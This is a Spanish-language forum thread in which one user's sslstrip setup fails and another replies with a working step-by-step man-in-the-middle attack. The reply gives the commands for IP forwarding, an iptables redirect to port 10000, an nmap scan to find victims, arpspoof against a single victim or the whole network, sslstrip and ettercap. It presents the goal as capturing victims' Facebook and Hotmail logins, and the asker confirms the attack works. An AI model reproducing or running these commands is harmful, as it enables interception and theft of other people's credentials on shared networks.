Problemas con sslstrip [SOLUCIONADO]

Iniciado por r3vz, 12 Mayo 2010, 06:40 AM

0 Miembros y 1 Visitante están viendo este tema.

r3vz

Tengo el siguiente problema, veran he estado probando en mi red local sslstrip y no consigo capturar trafico de los sitios https.
veran lo que hago es lo siguiente
como root
echo "1" > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sudo sslstrip -k -p -l 10000
sudo ettercap -Tq -M arp:remote -i eth1 // //
o si solo una victima
sudo ettercap -Tq -M arp:remote -i eth1 ipvictima iprouter
He probado con sitios que no son https y si funciona por lo que el mitm no es el problema, ahora cuando configuro el navegador a travez de proxy 127.0.0.1 10000, inicio sesion en hotmail o gmail en algunas de las maquinas victimas con o sin tener activado ettercap y   y ahi si captura :(

me imagino que el problema radica en la redireccion del trafico en iptables pero no estoy seguro. tengo el archivo /etc/etter.conf editado de la siguiente manera

# if you use iptables:
  redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
  redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
bueno es la parte que interesa de archivo... si alguien le ha sucedido o tiene idea... tengo instalado apache y el puerto que usa es el 80, he parado apache y aun asi no funciona :(

felipao3010

Hola, de seguro te servira mejor utilizando los siquientes pasos.  ;D



1. Lo primero que debemos hacer es conectarse a internet.  :xD

2. Abres una shell y escribes

     echo 1 > /proc/sys/net/ipv4/ip_forward
     iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

3*. Este paso es para identificar cualquier ip conectada a la red, es decir asi podremos realizar un ataque directo teniendo la ip de la ''victima''. (este paso no es necesario si vamos a atacar toda la red)
Abres una nueva shell y escribes

     nmap 192.168.1.1-254 (buscara del 192.168.1.1 al 192.168.1.254)


3. Ahora si vamos hacer el ataque hacia la ip de la victima o a toda la red.

  Ataque hacia una victima

     ip victima = 192.168.1.3
     puerta enlace(la respectica a tu router) = 192.168.1.1

     arpspoof -i wlan0 -t 192.168.1.3 192.168.1.1

  Ataque a todos los computadores de la red  :o

     arpspoof -i wlan0 192.168.1.1

4. Abres una nueva shell y escribes

     sslstrip -a

5. Abres una nueva shell y escribes
     
     ettercap -T -q -i wlan0



Ahora esperar  :silbar: que la victima se conecte a facebook, hotmail..... etc, y te apareceran los datos en la ventana de ettercap, asi mismo sslstrip te genera un log en la carpeta home o root. ;-)

felipao3010

#2
Espero que lo hallas solucionado.   ::)

r3vz

Genial Bro me funcionado a la perfeccion te agradezco por tu tiempo saludos!!!